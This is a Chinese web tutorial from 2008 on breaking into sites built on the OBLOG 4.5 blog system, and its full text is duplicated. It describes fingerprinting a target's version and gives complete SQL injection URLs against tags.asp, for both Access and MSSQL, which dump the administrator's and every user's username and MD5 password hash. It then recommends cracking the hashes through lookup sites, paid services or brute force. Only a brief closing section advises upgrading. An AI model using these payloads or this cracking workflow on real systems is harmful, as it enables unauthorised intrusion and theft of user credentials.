教你一句話(huà)讓OBLOG將用戶(hù)密碼乖乖送上
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:01:58 作者:佚名
我要評(píng)論

隨著網(wǎng)絡(luò)技術(shù)的逐步發(fā)展,越來(lái)越多的企業(yè)擁有了自己的網(wǎng)站平臺(tái),通過(guò)此平臺(tái)對(duì)外宣傳自己,對(duì)內(nèi)讓員工可以更好的交流技術(shù)問(wèn)題與工作事宜。OBLOG作為一款多用戶(hù)博客發(fā)布系統(tǒng)在一定程序上滿(mǎn)足了企業(yè)的上述種種需求,很多企業(yè)通過(guò)OBLOG安裝程序搭建簡(jiǎn)單的站點(diǎn)交流平臺(tái),然而你
隨著網(wǎng)絡(luò)技術(shù)的逐步發(fā)展,越來(lái)越多的企業(yè)擁有了自己的網(wǎng)站平臺(tái),通過(guò)此平臺(tái)對(duì)外宣傳自己,對(duì)內(nèi)讓員工可以更好的交流技術(shù)問(wèn)題與工作事宜。OBLOG作為一款多用戶(hù)博客發(fā)布系統(tǒng)在一定程序上滿(mǎn)足了企業(yè)的上述種種需求,很多企業(yè)通過(guò)OBLOG安裝程序搭建簡(jiǎn)單的站點(diǎn)交流平臺(tái),然而你是否知道我們只需要一句話(huà)就可以讓OBLOG系統(tǒng)將全部用戶(hù)密碼乖乖送給入侵者嗎?今天我們就從攻防兩個(gè)角度來(lái)看看入侵者是如何通過(guò)一句話(huà)讓OBLOG將用戶(hù)密碼乖乖送上的。
一,判斷平臺(tái)類(lèi)型以及系統(tǒng)版本:
在任何一次入侵之前非法入侵者都要針對(duì)目標(biāo)站點(diǎn),目標(biāo)系統(tǒng),目標(biāo)服務(wù)器進(jìn)行必要的信息收集工作,這也是最快的發(fā)現(xiàn)漏洞所在的方法。當(dāng)我們將一個(gè)網(wǎng)站作為攻擊目標(biāo)時(shí),首先可以通過(guò)查看主頁(yè)的“源文件”來(lái)判斷其使用的站點(diǎn)搭建系統(tǒng)類(lèi)型,然后在通過(guò)對(duì)應(yīng)的命令查看站點(diǎn)搭建系統(tǒng)的版本。下面筆者就從攻擊實(shí)例出發(fā)進(jìn)行介紹。
第一步:我們鎖定了一個(gè)內(nèi)部網(wǎng)站,我們不知道該站點(diǎn)是使用什么類(lèi)型的程序搭建的,那么我們可以通過(guò)在首頁(yè)點(diǎn)“查看->源文件”,然后在打開(kāi)的index頁(yè)面源文件中查找相關(guān)信息,對(duì)于沒(méi)有太多豐富經(jīng)驗(yàn)的站點(diǎn)管理員來(lái)說(shuō)并不會(huì)對(duì)全部版本信息進(jìn)行修改,所以我們可以通過(guò)index頁(yè)面源文件的開(kāi)頭或結(jié)尾查找到有用的信息。當(dāng)然如果站點(diǎn)管理員經(jīng)驗(yàn)豐富的話(huà),他會(huì)把所有蛛絲馬跡的版本泄露字眼都刪除點(diǎn)。
第二步:經(jīng)過(guò)筆者查詢(xún)發(fā)現(xiàn)在index頁(yè)面結(jié)尾處有www.oblog.cn的字樣,看來(lái)這個(gè)站點(diǎn)系統(tǒng)是由OBLOG程序搭建的。我們也順利完成了系統(tǒng)類(lèi)型的判斷工作,將入侵主要精力放到了攻擊OBLOG系統(tǒng)上。(如圖1)
圖1
第三步:接下來(lái)我們通過(guò)IE瀏覽器直接輸入http://ip/ver.asp,對(duì)于沒(méi)有經(jīng)驗(yàn)的網(wǎng)絡(luò)管理員來(lái)說(shuō)是不會(huì)刪除這些默認(rèn)的系統(tǒng)版本泄露文件的,從顯示中我們可以看到該OBLOG系統(tǒng)使用的是4.50 final build0619(access)版,版本為4.5,數(shù)據(jù)庫(kù)類(lèi)型是access數(shù)據(jù)庫(kù)。(如圖2)
圖2
至此我們就順利的完成了目標(biāo)站點(diǎn)的系統(tǒng)收集工作,了解了該站點(diǎn)是通過(guò)OBLOG搭建完成,而且使用的OBLOG安裝程序是4.50 final build0619,使用的數(shù)據(jù)庫(kù)是access。
二,根據(jù)程序與版本漏洞進(jìn)行入侵:
不同版本,不同程序的漏洞不同,入侵方法也不同,對(duì)于OBLOG 4.50 final build0619版來(lái)說(shuō)我們可以通過(guò)標(biāo)簽法實(shí)現(xiàn)入侵目的,利用SQL注入漏洞讓OBLOG將全部用戶(hù)的帳戶(hù)名與密碼顯示出來(lái)。
第一步:通過(guò)http://ip/tags.asp命令顯示出該OBLOG系統(tǒng)的所有標(biāo)簽信息。(如圖3)
圖3
第二步:我們隨意選擇一個(gè)標(biāo)簽,要求這個(gè)標(biāo)簽里面是有內(nèi)容的,不能為空。里面內(nèi)容包括名字,發(fā)布者與發(fā)布時(shí)間。當(dāng)然還有一點(diǎn)特別重要那就是記下這個(gè)標(biāo)簽對(duì)應(yīng)的ID信息,例如筆者選擇該標(biāo)簽后上方地址處對(duì)應(yīng)的ID地址信息為“tags.asp?tagid=42”。(如圖4)
圖4
第三步:接下來(lái)就是通過(guò)一句話(huà)對(duì)OBLOG系統(tǒng)進(jìn)行SQL注入入侵了,我們?cè)谥坝涗浀腡AGS標(biāo)簽ID信息基礎(chǔ)上添加注入命令,例如上面看到的ID地址信息為“tags.asp?tagid=42”,那么我們輸入以下內(nèi)容——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
代碼中有兩處是于tagid=42相對(duì)應(yīng)的,這點(diǎn)需要特別留意。當(dāng)然如果目的站點(diǎn)使用的是MSSQL數(shù)據(jù)庫(kù)而不是本文介紹的ACCESS數(shù)據(jù)庫(kù)的話(huà),相關(guān)的SQL注入代碼也要進(jìn)行改變,具體內(nèi)容為——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username+char(124)+password,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder
該命令執(zhí)行后OBLOG將把管理員的帳戶(hù)名與密碼顯示出來(lái),我們可以在顯示頁(yè)面中看到相關(guān)信息,在|前顯示的是帳戶(hù)名,后面是密碼,不過(guò)密碼都是通過(guò)MD5加密過(guò)的。(如圖5)
圖5
第四步:除了讓OBLOG顯示管理員相關(guān)信息外我們還可以通過(guò)以下指令讓OBLOG顯示其所有用戶(hù)名與密碼信息,這也是非常危險(xiǎn)的。具體注入代碼為——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_user union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
輸入完畢所有在該OBLOG博客平臺(tái)上注冊(cè)的帳戶(hù)與密碼都會(huì)顯示出來(lái),同樣密碼是經(jīng)過(guò)MD5加密過(guò)的。(如圖6)
圖6
第五步:有了明文帳戶(hù)名與MD5加密過(guò)的密碼我們基本上可以直接破解出明文密碼,只需要通過(guò)一些MD5查詢(xún)站點(diǎn)就能夠?qū)D5密碼順利還原為明文信息。(如圖7)
圖7
第六步:不過(guò)并不是所有MD5加密密碼都能夠通過(guò)查詢(xún)站點(diǎn)反查出明文信息的,如果不成功的話(huà)我們只能夠通過(guò)MD5暴力破解工具實(shí)現(xiàn)了,關(guān)于MD5暴力破解工具筆者在以前的文章中進(jìn)行過(guò)詳細(xì)的介紹,這里由于篇幅關(guān)系就不繼續(xù)說(shuō)明了,總之暴力破解MD5密文需要的時(shí)間是比較長(zhǎng)的,一個(gè)7位明文密碼對(duì)應(yīng)MD5密碼的破解需要幾天時(shí)間。當(dāng)然一些MD5密碼反查站點(diǎn)也提供了相關(guān)有償服務(wù),部分密碼的反查需要我們支付一條一毛錢(qián)的費(fèi)用,如果覺(jué)得暴力破解麻煩的讀者可以選擇付費(fèi)服務(wù)快速解決問(wèn)題。(如圖8)
圖8
三,如何防范:
該漏洞只存在于OBLOG安裝程序是4.6 final版本之前,所以作為OBLOG站點(diǎn)管理員的我們只需要將OBLOG版本進(jìn)行必要升級(jí),升級(jí)到最新版本即可,這樣該注入漏洞就會(huì)被順利補(bǔ)掉,我們也完成了安全防范目的。最新的OBLOG升級(jí)程序我們可以到www.oblog.cn站點(diǎn)進(jìn)行下載,相關(guān)升級(jí)方法與更新彌補(bǔ)漏洞情況也會(huì)在升級(jí)程序的幫助文檔中詳細(xì)說(shuō)明,感興趣的讀者可以自行研究。
四,總結(jié):
網(wǎng)上很多現(xiàn)成的站點(diǎn)或CMS甚至是BLOG搭建系統(tǒng)都存在著這樣或那樣的漏洞,因此如果企業(yè)使用這些現(xiàn)成程序安裝自身網(wǎng)絡(luò)平臺(tái)的話(huà)就一定要隨時(shí)關(guān)注升級(jí)信息,必要時(shí)可以在相關(guān)站點(diǎn)注冊(cè)會(huì)員并記錄自身電子郵件地址,這樣對(duì)應(yīng)程序有升級(jí)和新版本發(fā)布時(shí)我們就能夠在第一時(shí)間收到相關(guān)電子郵件獲得升級(jí)通知了。另外在搭建網(wǎng)絡(luò)平臺(tái)時(shí)盡量避免access數(shù)據(jù)庫(kù)的出現(xiàn),畢竟access數(shù)據(jù)庫(kù)不太安全,相關(guān)程序存在漏洞的可能性比較大。
一,判斷平臺(tái)類(lèi)型以及系統(tǒng)版本:
在任何一次入侵之前非法入侵者都要針對(duì)目標(biāo)站點(diǎn),目標(biāo)系統(tǒng),目標(biāo)服務(wù)器進(jìn)行必要的信息收集工作,這也是最快的發(fā)現(xiàn)漏洞所在的方法。當(dāng)我們將一個(gè)網(wǎng)站作為攻擊目標(biāo)時(shí),首先可以通過(guò)查看主頁(yè)的“源文件”來(lái)判斷其使用的站點(diǎn)搭建系統(tǒng)類(lèi)型,然后在通過(guò)對(duì)應(yīng)的命令查看站點(diǎn)搭建系統(tǒng)的版本。下面筆者就從攻擊實(shí)例出發(fā)進(jìn)行介紹。
第一步:我們鎖定了一個(gè)內(nèi)部網(wǎng)站,我們不知道該站點(diǎn)是使用什么類(lèi)型的程序搭建的,那么我們可以通過(guò)在首頁(yè)點(diǎn)“查看->源文件”,然后在打開(kāi)的index頁(yè)面源文件中查找相關(guān)信息,對(duì)于沒(méi)有太多豐富經(jīng)驗(yàn)的站點(diǎn)管理員來(lái)說(shuō)并不會(huì)對(duì)全部版本信息進(jìn)行修改,所以我們可以通過(guò)index頁(yè)面源文件的開(kāi)頭或結(jié)尾查找到有用的信息。當(dāng)然如果站點(diǎn)管理員經(jīng)驗(yàn)豐富的話(huà),他會(huì)把所有蛛絲馬跡的版本泄露字眼都刪除點(diǎn)。
第二步:經(jīng)過(guò)筆者查詢(xún)發(fā)現(xiàn)在index頁(yè)面結(jié)尾處有www.oblog.cn的字樣,看來(lái)這個(gè)站點(diǎn)系統(tǒng)是由OBLOG程序搭建的。我們也順利完成了系統(tǒng)類(lèi)型的判斷工作,將入侵主要精力放到了攻擊OBLOG系統(tǒng)上。(如圖1)

圖1
第三步:接下來(lái)我們通過(guò)IE瀏覽器直接輸入http://ip/ver.asp,對(duì)于沒(méi)有經(jīng)驗(yàn)的網(wǎng)絡(luò)管理員來(lái)說(shuō)是不會(huì)刪除這些默認(rèn)的系統(tǒng)版本泄露文件的,從顯示中我們可以看到該OBLOG系統(tǒng)使用的是4.50 final build0619(access)版,版本為4.5,數(shù)據(jù)庫(kù)類(lèi)型是access數(shù)據(jù)庫(kù)。(如圖2)

圖2
至此我們就順利的完成了目標(biāo)站點(diǎn)的系統(tǒng)收集工作,了解了該站點(diǎn)是通過(guò)OBLOG搭建完成,而且使用的OBLOG安裝程序是4.50 final build0619,使用的數(shù)據(jù)庫(kù)是access。
二,根據(jù)程序與版本漏洞進(jìn)行入侵:
不同版本,不同程序的漏洞不同,入侵方法也不同,對(duì)于OBLOG 4.50 final build0619版來(lái)說(shuō)我們可以通過(guò)標(biāo)簽法實(shí)現(xiàn)入侵目的,利用SQL注入漏洞讓OBLOG將全部用戶(hù)的帳戶(hù)名與密碼顯示出來(lái)。
第一步:通過(guò)http://ip/tags.asp命令顯示出該OBLOG系統(tǒng)的所有標(biāo)簽信息。(如圖3)

圖3
第二步:我們隨意選擇一個(gè)標(biāo)簽,要求這個(gè)標(biāo)簽里面是有內(nèi)容的,不能為空。里面內(nèi)容包括名字,發(fā)布者與發(fā)布時(shí)間。當(dāng)然還有一點(diǎn)特別重要那就是記下這個(gè)標(biāo)簽對(duì)應(yīng)的ID信息,例如筆者選擇該標(biāo)簽后上方地址處對(duì)應(yīng)的ID地址信息為“tags.asp?tagid=42”。(如圖4)

圖4
第三步:接下來(lái)就是通過(guò)一句話(huà)對(duì)OBLOG系統(tǒng)進(jìn)行SQL注入入侵了,我們?cè)谥坝涗浀腡AGS標(biāo)簽ID信息基礎(chǔ)上添加注入命令,例如上面看到的ID地址信息為“tags.asp?tagid=42”,那么我們輸入以下內(nèi)容——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
代碼中有兩處是于tagid=42相對(duì)應(yīng)的,這點(diǎn)需要特別留意。當(dāng)然如果目的站點(diǎn)使用的是MSSQL數(shù)據(jù)庫(kù)而不是本文介紹的ACCESS數(shù)據(jù)庫(kù)的話(huà),相關(guān)的SQL注入代碼也要進(jìn)行改變,具體內(nèi)容為——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username+char(124)+password,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder
該命令執(zhí)行后OBLOG將把管理員的帳戶(hù)名與密碼顯示出來(lái),我們可以在顯示頁(yè)面中看到相關(guān)信息,在|前顯示的是帳戶(hù)名,后面是密碼,不過(guò)密碼都是通過(guò)MD5加密過(guò)的。(如圖5)

圖5
第四步:除了讓OBLOG顯示管理員相關(guān)信息外我們還可以通過(guò)以下指令讓OBLOG顯示其所有用戶(hù)名與密碼信息,這也是非常危險(xiǎn)的。具體注入代碼為——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_user union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
輸入完畢所有在該OBLOG博客平臺(tái)上注冊(cè)的帳戶(hù)與密碼都會(huì)顯示出來(lái),同樣密碼是經(jīng)過(guò)MD5加密過(guò)的。(如圖6)

圖6
第五步:有了明文帳戶(hù)名與MD5加密過(guò)的密碼我們基本上可以直接破解出明文密碼,只需要通過(guò)一些MD5查詢(xún)站點(diǎn)就能夠?qū)D5密碼順利還原為明文信息。(如圖7)

圖7
第六步:不過(guò)并不是所有MD5加密密碼都能夠通過(guò)查詢(xún)站點(diǎn)反查出明文信息的,如果不成功的話(huà)我們只能夠通過(guò)MD5暴力破解工具實(shí)現(xiàn)了,關(guān)于MD5暴力破解工具筆者在以前的文章中進(jìn)行過(guò)詳細(xì)的介紹,這里由于篇幅關(guān)系就不繼續(xù)說(shuō)明了,總之暴力破解MD5密文需要的時(shí)間是比較長(zhǎng)的,一個(gè)7位明文密碼對(duì)應(yīng)MD5密碼的破解需要幾天時(shí)間。當(dāng)然一些MD5密碼反查站點(diǎn)也提供了相關(guān)有償服務(wù),部分密碼的反查需要我們支付一條一毛錢(qián)的費(fèi)用,如果覺(jué)得暴力破解麻煩的讀者可以選擇付費(fèi)服務(wù)快速解決問(wèn)題。(如圖8)

圖8
三,如何防范:
該漏洞只存在于OBLOG安裝程序是4.6 final版本之前,所以作為OBLOG站點(diǎn)管理員的我們只需要將OBLOG版本進(jìn)行必要升級(jí),升級(jí)到最新版本即可,這樣該注入漏洞就會(huì)被順利補(bǔ)掉,我們也完成了安全防范目的。最新的OBLOG升級(jí)程序我們可以到www.oblog.cn站點(diǎn)進(jìn)行下載,相關(guān)升級(jí)方法與更新彌補(bǔ)漏洞情況也會(huì)在升級(jí)程序的幫助文檔中詳細(xì)說(shuō)明,感興趣的讀者可以自行研究。
四,總結(jié):
網(wǎng)上很多現(xiàn)成的站點(diǎn)或CMS甚至是BLOG搭建系統(tǒng)都存在著這樣或那樣的漏洞,因此如果企業(yè)使用這些現(xiàn)成程序安裝自身網(wǎng)絡(luò)平臺(tái)的話(huà)就一定要隨時(shí)關(guān)注升級(jí)信息,必要時(shí)可以在相關(guān)站點(diǎn)注冊(cè)會(huì)員并記錄自身電子郵件地址,這樣對(duì)應(yīng)程序有升級(jí)和新版本發(fā)布時(shí)我們就能夠在第一時(shí)間收到相關(guān)電子郵件獲得升級(jí)通知了。另外在搭建網(wǎng)絡(luò)平臺(tái)時(shí)盡量避免access數(shù)據(jù)庫(kù)的出現(xiàn),畢竟access數(shù)據(jù)庫(kù)不太安全,相關(guān)程序存在漏洞的可能性比較大。
相關(guān)文章
- “CMOS密碼”就是通常所說(shuō)的“開(kāi)機(jī)密碼”,主要是為了防止別人使用自已的計(jì)算機(jī),設(shè)置的一個(gè)屏障2023-08-01
QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒(méi)有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調(diào)用QQ的OCR的,但翻譯按鈕確實(shí)沒(méi)啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04- QQ截圖是我用過(guò)的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨(dú)立版目前除了屏幕錄制功能其他都逆出來(lái)了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導(dǎo)致軟件無(wú)法安裝的解決方法
很多電腦用戶(hù)在考慮自己電腦磁盤(pán)分區(qū)安全時(shí)會(huì)采用 Windows 自帶的 BitLocker 加密工具對(duì)電腦磁盤(pán)分區(qū)進(jìn)行加密。但有些人加密后就會(huì)忘記自己設(shè)置的密碼從而導(dǎo)致在安裝其它軟2020-11-25防止離職員工帶走客戶(hù)、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細(xì)介紹了如何才能防止離職員工帶走客戶(hù)、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-06-27徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機(jī)密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價(jià)值,2017-06-27量子計(jì)算機(jī)輕松破解加密算法 如何破解加密算法?
最近有電腦用戶(hù)反應(yīng)量子計(jì)算機(jī)可以破解下載的所有的加密算法嗎?其實(shí)也不是不可以,下面虛擬就為大家講解買(mǎi)臺(tái)量子計(jì)算機(jī),如何分分鐘破解加密算法2016-09-26怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網(wǎng)頁(yè)文件形式存在的一種命令執(zhí)行環(huán)境,一種網(wǎng)頁(yè)后門(mén)。黑客通常會(huì)通過(guò)它控制別人網(wǎng)絡(luò)服務(wù)器,那么怎么破解webshell密碼呢?一起來(lái)看看吧2016-09-19針對(duì)Linux系統(tǒng)全盤(pán)加密的啟動(dòng)攻擊
本文討論了針對(duì)Linux系統(tǒng)全盤(pán)加密的冷啟動(dòng)攻擊,大家都認(rèn)為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28防止泄露公司機(jī)密、企業(yè)數(shù)據(jù)防泄密軟件排名、電腦文件加密軟件排行
面對(duì)日漸嚴(yán)重的內(nèi)部泄密事件,我們?nèi)绾问刈o(hù)企業(yè)的核心信息,如何防止內(nèi)部泄密也就成了擺在各個(gè)企業(yè)領(lǐng)導(dǎo)面前的一大問(wèn)題。其實(shí),針對(duì)內(nèi)網(wǎng)安全,防止內(nèi)部信息泄漏早已有了比較2015-12-17